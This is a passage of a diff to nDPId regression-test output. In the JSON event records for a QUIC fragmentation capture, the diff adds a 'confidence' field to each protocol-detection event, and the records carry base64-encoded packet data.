jeqdjRSRxqRsLbcqLCC9cOmgjc\/ohryRRJQyMJtXeWbDrdqNKdq1pDxsuJ4wwMBMesHq4H0mEc4PlhC8w6AbhwgQpeeSZn5X2ZrFQy5Ipg3+vRKwYL\/Mi3kjrs2fSPNxarNRLlKyoY7f4hw2NjTzNWp0j2aXeNoKqTjDtXyit70tR4YqLzkn9C0xp0mUo9nxF4EWJdmjCX0ANdhrJMcQX5aRmmU+t3M1w1Bgicj3DEsU\/1FRB7DjmpdgCWCW4r5M6W6LkewBSsNiNSC3DnsTbf6eTU4wOue5\/0G7VJOcj6q0duKzEYYTXcoYAbuKiXnvE4OcU"}
-00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431355629,"flow_last_seen":1621431355629,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431355629,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":51456,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00692{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431355629,"flow_last_seen":1621431355629,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431355629,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":51456,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431369135,"flow_last_seen":1621431369135,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431369135,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":63163,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02311{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1621431369135,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621431369135,"pkt":"AAAAAAAAAAEAWIVLCABFAAVi+m5AAH4RGJmokEAFcfqJ8\/a7AbsFTuukwf8AAB0IwkoI2nuQHYUAAEU01K7fN93B4MUASGiXGUyARwSY+4aO68HNYjEt7GWPzfJckCAv1T4i5dLLPnKrxPNl7uR\/wsXzoosnnjNfCeM6JnFogGoD8Fd67g3pBz\/4xd9MrHK8spfp0sKR5PgUqqWOgvCutevbQ8qYXNVgijT5\/8AiGcOOHWAx5JOe9WKc+HYLYWnuE5L3HEZQo4nrWEMko3D15BJbkyW22cYvauBzrX7Zq2OYwnKGwfvfdTYQGFwBMKheaRrgDFFEbI95H6nND\/F7o65wah9YFCBHrCZCULES1ZD7GJY\/Bqf\/MjcEld0g3C+HvcIVjENbzsXizvCuDmTJV9YcPMpv9s382puliOWP4gOQWgoAG3Ao6cfEvPQFaiuvHkR1sXIVJDapx4gQAa8qedAjI4Qk9A2tznfUat8eb5YjNDd00djuz1xXJ1+7\/xnEryQeYx5B9q0Yh4cp1f8Mpm8PkVLPsaI5EJD7Bo2TjORoihUYfLnocxxlk+mWTWVOcQW\/cjslUg1\/uOKIPppK9Zo0xPvYv4LI237JcA2TOoJFeS2HbNf22y6wRXsJR7Z1jYbJCoLzvh8chtuZ6AA0Jcfp8DQO6eEIRfW\/h5uscIqr7vrdGBDh5\/zvBHXMvSXwUSNMs9ju24jzW8z9yJsqxVYmitvQJ7dOrLH\/K5mn71oTWSfLy9yPsyJGefj4rQHs6usmcTj3v05Oe+rdTxkAwaXEjfHjw7A18cRPFLq1e7XPVF15OaAIZGGJW+X9C6SnLNTHrGmlAeBe5bF1NxyJ8XbUSvQBp1NyQhLMJ6GHeTnqG2+oKcMtLlDqhrjxBcqwGzBORNaeIk37oEDvRj2ULgb1Cu19EZ8tiMvhQaCqwm6eg\/krsi8k4E\/id\/90KGowDX\/Pr\/s1sAND5Dh+Md7iwKz3tFkcVqiC9XKQGYvwvrNl3M\/DVbx88F8Mq1fhBPFp75j4duggfbVz4fePFTUYQyXEdkFrbprYYprY3G2nbXPGgbmp+\/keXeMNgYEi7eCqoK5MGIiI5kYO52LEu7uBHu6gfW0a\/oN3u8Hg87YiAKF6G4HUNDN7ak+kYj0Gg+8\/osNPKdMNnn3Ttq+e4FpeaVuPQtri+1\/ozlT88MEsTrI4ZjcLkQrdsDGrSk5pFNuuaNdnBxmLTD9+Y31TuPjZdF3y8aerRjGjcKA924zFY6F3+erxKilvfVdWBBMq\/sZv6Vksw\/+Fz1wttZxo9VEZshnZyBhQtfaWNbpCUMCLWSIOTygpzB56\/djZxzMToQ0OTov79H21iuzt9kW26NuI44K+W4r3zJK44FZlurMlKsoEREV+b\/FORcM8avXBcW20SB9dZBdfAIWoFzST8hpkmnW5KzJkqUXpqJQJHsur9uW7QvcJJs3nF\/XtsYVO7wfuWlEoUZSI7JS9k\/vtrqWVy2X+CigTWqjVYJhzagu87STW7dgMdyFPWLSjmBjeACNJOqSiLuLI6nqP7AToDkXf2o2wX1ea4tL+l2elnz8UUQ0mwPbx3D2flZoxja8QhG\/H0Dkv\/zqHUfQXS1ey7dOzI0gQWGL2bong5dY9vIH\/KH\/EE5WN9+MZTB5oOqSTzGQ0G10wtkmcpl7cceFjmLyC\/CPGRf1WcWpg0St7TVzKyiD9jSy7E7M+Mef3DDpD6ufY+IM3YsYXJiOqBLz9Mad7YJnU4xywy8xIlHMAZnyk840yn2AImi8yGcKAuOx8ekNKD\/3YSrti2Nd30LJbAbXW+9aUyCWGxhaYhZKKyYrgwwNNaQQ6T+r69Xv\/AhEpDvcH"}
-00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431369135,"flow_last_seen":1621431369135,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431369135,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":63163,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00692{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431369135,"flow_last_seen":1621431369135,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431369135,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":63163,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00623{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431370645,"flow_last_seen":1621431370645,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431370645,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":54016,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02310{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1621431370645,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621431370645,"pkt":"AAAAAAAAAAEAU0VlCABFAAViMu9AAH4RJlaokEAFmWIcTtMAAbsFTkg1z\/8AAB0I+lN8UldDPwoANwCkKLl+3h3UHIQgS3vcwcXrZ6T5hiytz4Q4TWQ7pmsAJO5xTHpseYqRKlKHmxme9TRfa47qWTNE\/T2kS0vQRKN+NvKsLSu+R20pLtVijhGmejNVjxQkpOqlEUNcFIHcN2wzhOdXdZI9UF3VUhNkOijfbeykwXjQP1\/nKm9mO0G\/ypc7Y2OQX8KQjJvTKmxfJgoiRMmIZd66ehWzpVA7ADDpyDredKxOTaDSAYoR9nNN9ch6nx3ZMTTXTycMrWty+BPeuRbrkASH1HytOMULRsu12u6n42QgaeYSvJl7RKIje\/FCPE4VKoS2bBqDGJdyFYhy9WpCdBYHFXRsvzage9S\/AuIhACnspXakPoSAAKTsCYsy7O8Xfk5D9YcZNZIWuP2P5LmgHVsAyYCWuB0zDz\/P\/niv7vxRu76Gc2OqQjwDwC1yI28dLAM1\/qVCYRFk9YMbF\/iD7Nsy5jvI9F\/PUuc57iiKLeU\/x1YGOwxmbb1YAjhXgnTaAuvlp4rcuFTF\/jkRDZDwvS0ElQbZ1sDIOXoAhaFOvXD0EKhqtqXAu8QvhDZA4eNLtzEFYCKh+iIymyxHd3zWX+3NxjMpE9Ns6UHSd84eMRpZcGmgG02e\/nW7OJALJ0IxLfndoUAlJk4IvuZcxngA9k\/unBNCOAlRVhFhhDnD4zD9WKXcfMQ8zOFHhmGS13WBEjy7kK3uLOIS3qui39MawSxNS7Ml6mSKoaSyb4+SNDLXoJWz3B44z0+hVh4WwxeJPSZ7w0VPVgCLDMcbCK1ByAz8JXWCFN83+GTRF5hMdm4dISfNt7qLcE3DH5CsDA+yUGakDromNlDnPMXyFA3nBYHp4IXGe9Qb9ePX1Y\/SndfWnyp3BEETdFg9vGIGsMMkmqU+J5mYsWQmYX5\/h7SfM4llXroWubSp8gBiYn3ZEiVxAgaNGqIripZvwoMsqPR8pCBgu6y3F8BYlwrVh+ZxYeOX5ab1qs+HTR\/VqeeVG8Eay\/MH5IQteK\/x80AjKjDmsExVlZ9Yvq1ASQtfskSMH0GMY9POIkrjW7EvJxN5wK\/qGiieo8H6mYS7uXrxZHkGc68vVyNWX9p3QoffUgaN1rL++0wS2CIvPmNLRJCwPEEWdTb37V1X6bBSAYmxZUUOT8oUGnsozk6dfMeAsBVRYGBaFG9+Y1uHxPYwvKwCvo+pVvLyi9jA\/MUPqdH5HKAlVkIxZHfTN0TbmkKqYM1+\/dGw42Opggft9Ujn+E6Te2o7P21d6\/4ziedAj7hW\/ducyroIUruOxK6kZkZIfc1rfDtpstdc1OwhsM8efvN8mSqQCgneDcWSXy4bE3JNAWNwVmsvgrlZnik2Id38oh\/fD8oub9PI\/kmIUiP1uSKBBkJyEnZ\/+uDpCaSemLo73IkSmAKSVsNdykI61VqMLJEb+fNx3Qf\/\/ppmJTj9\/JSXpVaRHvFY4L8IDk53+jFdIKFjZmAbMyUI5v3Br8tILw49LDtUwMV8TUdpFD45PjvSQ+YyqLq+OuacdGaLpMcBrUOmuMqWWPYG89KlxtPyViKOZQDTS8sb2EBEHN8hGk3fUXt1bo+FE8NSXvIg7NRqP5Nv3yrdaqPCA7cxMCsT0Z4cAs4COX\/fJ4v3Qpyc7hbzFiy9BZYDLGPjdm9XGzS14zLvvjA8ujJQXVu8\/cqxKCkP5AWXvVW61iwAkR3yFCXIjI79f5ml9EjzFluSxM8yINcpyXkiGxaLUSehYQkeNBr1bVFEIJq2IJOjgn8tdoygPZ\/Ggtxsz4Ympsa29lLPp\/1R"}
-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431370645,"flow_last_seen":1621431370645,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431370645,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":54016,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431370645,"flow_last_seen":1621431370645,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431370645,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":54016,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00624{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431370796,"flow_last_seen":1621431370796,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431370796,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"99.42.133.245","src_port":51248,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02299{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1621431370796,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621431370796,"pkt":"AAAAAAAAAAEAWIVLCABFAAVimjxAAH4Ri5mokEAFYyqF9cgwAbsFTgeRwv8AAB0Iy4aUElydjLEAAEU0cgy7g6waI4s\/Db31CXMNLtpBLCBMqbNNIERpncwoj\/mzw930r9KSGtTDq0Un\/reM90\/o2LMUXhAxGEjpV8kM2isFWzwDO4KLtdnvjoVU\/jW5X1cAIJGi224o+IBoqe\/q3MhszxPlHqwkUkoHgcWP8rFY11sIccKhMsLy4OlgMZHEtOM9cK6MhXXnbI4PIfeHbKw3eQF9bmAITBhN2hEUuCQ5tkEGA44Ny7kWGmEH8N+oonqrQFSRfhvaY3aPSuVRpbZIPtuPu5FfCgb9SlrhiL+YFIGOqSPYS1Fga7DZceldELqsQnht1L6sPyvDZGhFHGevrPqJKYsG5AJ1dz0CBKyRoEBiPDMdvlFISahZktRsu1zHBcqXO6dH\/i8qaCuLB3C0cU7Mf84KfPTeo\/gsTws0xYHHMgBbeLbnL3UFA5r6TMOj9bItn6l59owKGAThBrdETsc3kNqb2EaYZyfxOIPnMT50EN3E5+o1NkgWuOzUcI4wNbi\/tPHdtNay4zsdQpx+v0mHMwKaNOaS1cXTI5EglEP9nh0+7Pd14q0LRBQ3DeciSithO1E4K1W\/Z4sWicTGPnlHMSkhRPDqwcMrqZYI65EaAXb2hwQHTLQOC3yEOm8uj32O6iPw1kmWecebjTAhzoITApAhOJNqbhOhmL3LYzlMNpCxKIbZWwXYI7KE\/nyX+9ktlfBgqL7lMUB\/nzCvI8L8RT\/TyhNdGRodyYga3YaHfnznNluGiCWRkzVsHTXG5IbNbGj69KA73CTFlz3wgsOw1uHC\/q3RChP7l2qOfWKIMtxcvHriXoLF\/vYMzoqEm8pCiWCoZMnY39DH0b5dzrRQCWGNuyliasUzdNwfCWtlCp7bb4qxiMpsXc+uNU+g2bw+VTTlx1U6pmIskkdKx+mP5J+pvDAUA8T3JVvzUY7NyB8IEQ0IbbpFr4IAdnh2CDfm\/3LkeBAfOpK4ISFWDT\/Zq8xGBrTh4yq\/7VJSuZCIU6mdUPZvVTVYBmdKXePmLICT7JVQHsyS6MxIt1eR8vw5vXsNJo11Hj6NXO8R3qnkStwD3Hp1s8H3wRtuYv0txfoYvO+JQlg0ebqSA11uOBMpoISeySuHozQ8oCCsnJndgourEdZSSgF1xkc5zlxohntckX9YYRJuzAJGjDN4T1wfrPFQyenplFLZHMDpAhiV7Te3CCs6SKS28MBI6cwMwV1jZ4JX4bfrUb5Sbdar5XQqw9SbBJFJJmemfZlNvZabnR9m9F8aNRgxnvKtrT\/oN6gP7nsRQo4l8nySxze1hd0tyD8+tMuNQJRNnwq\/z6am\/OObDrBsZm3FIBJGoG3zuBmWjHfo9F91ajEKf3cpkFlxxZkkSD9hD9i3XpaytXko+K4WOBWAhjq6wftsLdQLBpeCv6ZMwSeTt2tPaiX6D3HlJiyhzzjMup+ygJV6xano1oW2u\/3nyWiYV0GHV+b5y0lkHYM1dgiTaT2KrSOD3IRFXFcs9y8cNjsa5kJDBFFwGRXnrEEfcCFRxk12riHmlcId3GMVfy4P0YANskdNyw2M+xiEcOkt6DL850Uen9ExlETBFpaBh9C+ABSY+1ty8tYaL3zfMeNRiFgkNZZN1r942JOKKotMtpCq+6AVsdDiJcE3TtG4YJZ2yTO5bCLeezzQEhXvpEnuAz6dq59BUrxZNWOqZ8HHhEXq3N82ukDRJgBUvK0NQJTyZjgLcV\/Y6DWk0EO9WY2nkKr38\/Agezi3TaatfB4TRt19446lztdcfJd7DYB6DWTlmwbRMquv"}
-00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431370796,"flow_last_seen":1621431370796,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431370796,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"99.42.133.245","src_port":51248,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00690{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431370796,"flow_last_seen":1621431370796,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431370796,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"99.42.133.245","src_port":51248,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00629{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":30,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431305591,"flow_last_seen":1621431305591,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431431363,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"121.209.126.161","src_port":50482,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00628{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":30,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431307075,"flow_last_seen":1621431307075,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431431363,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"158.146.215.30","src_port":62652,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00626{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":30,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431309055,"flow_last_seen":1621431309055,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431431363,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":63136,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -79,14 +79,14 @@
 00629{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":30,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431299729,"flow_last_seen":1621431299729,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431431363,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":53404,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00625{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431431363,"flow_last_seen":1621431431363,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431431363,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"45.228.175.189","src_port":60896,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02304{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1621431431363,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621431431363,"pkt":"AAAAAAAAAAEA737VCABFAAViT5FAAH4R4cKokEAFLeSvve3gAbsFTo4zzv8AAB0IdJfsHA8rg\/UANwBZgvMHq3AV4dyxbh1M7qxYXz\/QqdNTBH1HN0CS98tw5ggQc1OjegApOEUGthGeOLQM+rNmjRhE\/clLK4HuBl1LUEre0au1gZTt1KqH6IUxZKrE2sGM+Fqy7i7mdjukue2Wu9obDV8t84mfBGQvFDIc4C1GtNO91WWUABZgT7OXtAGbDvKSc6M0BxmN8Ta9If00OJSKfKhlAsrhpMyMxJleFReMHQ4vg3EHhEg3\/NEef0p7Zb8BSIABFdcX93ZJbQwy+tHFaBeQPW5hn0M6xbNjf\/RY8iKGm7C2EQaLG\/adPJ1obLE57u5xg+UA+iXg0DYCJwxxRWfvhsQNGcUILv1KPQmWIddwcM+oBfVZ7KRAyWk+0AiZGEtw5sCcIbEGLLWCyvoCaVrzFwX4Kxz3c7epqJFIX\/G4r4+8H23LqwgKdJlZseYuGRd9WZ17cAlMwRxkcaXk6EXP9kebqJHJ3dsOkzIicKHPAuN+sTLUfuCH9AK8a\/4BqLh0qhEbE4oM2O7m0ZqtxPFpAd5AdDOcmU0hU21c5xII4eHDJKcgQfeUv8B8IfJzEDaXWMwoJj4d4vPmcte8bu\/qmXZ1s8mPqlbPtjg8e7kqLmBzoI9FINBrXqlwZ15IYu8U9PmD0+zaeALYJjz54xNHN5vMvsd1bG1xBVwnOw1yRR07LgIALUvx1jSrXJCtvK9x3n0e17\/4XbEbU23L0VEkeWuLpyKfzxELjZtRJEtpFPK65Oka98APYQk+cvApo4Lv78agQ4isgrdWL\/lPZZz4e1uzhC0FBRUgyvNQPK2FuPLSh6vnlitflvFrugGvGJPfCcZvXgSXYhz6PyAu6ucrDkSDkrlCeDqiNpAW9DPw533VK1F2HoCn3U9TSSojbSvKUhD5pkbtLeWikk9yO3bArlheE4cXpsDpxzpKyb+b625k3E3BKOMUug6yBthPhhd+KYT9k7QNv49jm145a6LOpftpBseU6YgEk3IkEn1kE0Ry+7JgvD+e7\/hPh4fTdkqT4\/TjJBDL\/5cc4C745utJS\/GXQLmxqClZo8OaKh+kXsNsf3UBWFfLD7KYYITUazzjm4HTDJx22SBXRiSymUZaCiqENZ+uQsLGTRXM6uMxohZt8R\/IQ8G0EqRIa+L34Shdk3NM4sny6iPaT2GH9XAJHyLYemSXNtIrflbXIk7DcAe9WoEKXLafhV1Jrt2VExW1lKiX3NE7AAcMr2YnXBca+0F0\/6iDygHo5jrguhUsl0G\/7cLdUv8CGCYL3MesNJjj71hJsM+4d2agB4IWoE5R19rtfLA1vtKIDOXTGa2fzqMjyQoe+YW5HTBVmgNVSkZf8TM5SDI0XzGDjmd5nIpY2o3rBWBv9s6WzH2rmNVqIh7TJUJMAcpiwJjtgJzrS5Df5gmwZJz6ADwyaSKk2RZlhl7rdxydk46DIs+UU5sl+oKmvzr\/a0f+puDT8Pqc5OFZU4lQ5MXrn49YDCk9QPkWSlDYRK1UI4nr4NWKo\/\/Pw\/UFfpF9RnncBRyUFvONCCgRjmgmTi97CEEwbbxu\/Ki8qbPdIDbhcLsKaHhiFtKjKD0dMVkAfS16egEUxcfuMtmT8\/+LcTgqwwjg\/mITmoaavzef\/yGP6uX9jutL\/g3miLPjpmyK5Acy3dJwCKXrUWYFg70tEZ670oPo3w3+vZPuxYO7UtMA2cZA7eta5PXcPaU8MOYnga\/iqCsWqSwZ05kCD8++07rRI1TOxvKxLmRo5hLgAqZ\/VaeBFZ3vrlfLivk6N9hE4WT2M2RUIs7n"}
-00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431431363,"flow_last_seen":1621431431363,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431431363,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"45.228.175.189","src_port":60896,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00691{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431431363,"flow_last_seen":1621431431363,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431431363,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"45.228.175.189","src_port":60896,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
